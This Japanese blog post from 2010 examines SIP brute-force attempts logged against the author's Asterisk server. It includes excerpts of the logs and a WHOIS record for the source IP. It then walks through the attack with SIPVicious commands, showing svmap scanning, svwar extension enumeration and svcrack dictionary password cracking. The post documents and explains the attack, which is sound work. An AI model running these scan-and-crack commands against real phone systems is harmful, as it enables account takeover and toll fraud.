cNotes 検索 一覧 カテゴリ

不正なSIP着信 218.93.205.205

Published: 2010/04/16

しつこくやってきます。

  Registration from '"436599596"<sip:436599596@x.x.x.x>' failed for '218.93.205.205' - Username/auth name mismatch 
  Registration from '"374192414"<sip:374192414@x.x.x.x>' failed for '218.93.205.205' - Username/auth name mismatch 
 :
 :
 :
  Registration from '"100"<sip:100@x.x.x.x>' failed for '218.93.205.205' - Username/auth name mismatch 
  Registration from '"101"<sip:101@x.x.x.x>' failed for '218.93.205.205' - Username/auth name mismatch 
  Registration from '"199"<sip:199@x.x.x.x>' failed for '218.93.205.205' - Username/auth name mismatch 
  Registration from '"200"<sip:200@x.x.x.x>' failed for '218.93.205.205' - Username/auth name mismatch 
  Registration from '"204"<sip:204@x.x.x.x>' failed for '218.93.205.205' - Username/auth name mismatch 
  Registration from '"205"<sip:205@x.x.x.x>' failed for '218.93.205.205' - Username/auth name mismatch 
  Registration from '"206"<sip:206@x.x.x.x>' failed for '218.93.205.205' - Username/auth name mismatch 
  Registration from '"207"<sip:207@x.x.x.x>' failed for '218.93.205.205' - Username/auth name mismatch 
  Registration from '"208"<sip:208@x.x.x.x>' failed for '218.93.205.205' - Username/auth name mismatch 
 :
 :
 :
  Registration from '"9994"<sip:9994@x.x.x.x>' failed for '218.93.205.205' - Username/auth name mismatch 
  Registration from '"9995"<sip:9995@x.x.x.x>' failed for '218.93.205.205' - Username/auth name mismatch 
  Registration from '"9996"<sip:9996@x.x.x.x>' failed for '218.93.205.205' - Username/auth name mismatch 
  Registration from '"9997"<sip:9997@x.x.x.x>' failed for '218.93.205.205' - Username/auth name mismatch 
  Registration from '"9998"<sip:9998@x.x.x.x>' failed for '218.93.205.205' - Username/auth name mismatch 
  Registration from '"9999"<sip:9999@x.x.x.x>' failed for '218.93.205.205' - Username/auth name mismatch 
 :
 :
 :
  Registration from '"201" <sip:201@x.x.x.x>' failed for '218.93.205.205' - Wrong password 
  Registration from '"201" <sip:201@x.x.x.x>' failed for '218.93.205.205' - Wrong password 
  Registration from '"201" <sip:201@x.x.x.x>' failed for '218.93.205.205' - Wrong password 
  Registration from '"201" <sip:201@x.x.x.x>' failed for '218.93.205.205' - Wrong password 
  Registration from '"201" <sip:201@x.x.x.x>' failed for '218.93.205.205' - Wrong password 
  Registration from '"201" <sip:201@x.x.x.x>' failed for '218.93.205.205' - Wrong password 
  Registration from '"201" <sip:201@x.x.x.x>' failed for '218.93.205.205' - Wrong password 
  Registration from '"201" <sip:201@x.x.x.x>' failed for '218.93.205.205' - Wrong password 
  Registration from '"201" <sip:201@x.x.x.x>' failed for '218.93.205.205' - Wrong password 
  Registration from '"201" <sip:201@x.x.x.x>' failed for '218.93.205.205' - Wrong password 
  Registration from '"201" <sip:201@x.x.x.x>' failed for '218.93.205.205' - Wrong password 
  Registration from '"201" <sip:201@x.x.x.x>' failed for '218.93.205.205' - Wrong password 
 inetnum:      218.90.0.0 - 218.94.255.255
 netname:      CHINANET-JS
 descr:        CHINANET jiangsu province network
 descr:        China Telecom
 descr:        A12,Xin-Jie-Kou-Wai Street
 descr:        Beijing 100088
 country:      CN

動作的には、まず以下のusername(電話番号、内線番号)が存在するかどうかのチェックを行い、

 account 
 admin 
 administrator 
 alex 
 guest 
 mark 
 michael 
 test 
 test1 
 test12 
 test123 
 374192414 
 436599596 
 100〜9999

SIPサーバー上で

 Username/auth name mismatch

とならないものに関しては、応答が異なるために、そのusernameが存在するものと判断し、そのusernameに対してbruteforceを仕掛けてきます。


で、この攻撃がどのような感じで実行されているかというと、、、

関連するツールはSIPPとかSIPViciousとかいろいろありますが、例えばこんな感じ。

特定のアドレスレンジとかネット上に存在するSIPサーバーを検索

 % ./svmap.py 10.0.0.1-10.0.0.255
 | SIP Device    | User Agent   | Fingerprint |
 ---------------------------------------------------- 
 | 10.0.0.1:5060 | Asterisk PBX | Asterisk    |
 | 10.0.0.2:5060 | Asterisk PBX | Asterisk    |
 | 10.0.1.1:5060 | Asterisk PBX | Asterisk    |
 | 10.0.2.1:5060 | Asterisk PBX | Asterisk    |
 | 10.0.2.2:5060 | Asterisk PBX | Asterisk    |

見つけたSIPサーバーに存在する電話番号を調べる。つまり懐かしのWarDialer。。。

 % ./svwar.py 10.0.0.1
 | Extension | Authentication |
 ------------------------------
 | 201       | reqauth        |
 | 203       | reqauth        |
 | 202       | reqauth        |

で、みつけた番号に対してcracking。

 %svcrack.py -u201 -d dictionary.txt 10.0.0.1
 :
 :
 :

という感じで、対象のアプリケーションが変わるだけで、いつの時代でもやってることは単純で同じなわけですね。

で、これら一連の動作を自動シナリオでやってるわけです。

[カテゴリ:IP電話観察日記]

by jyake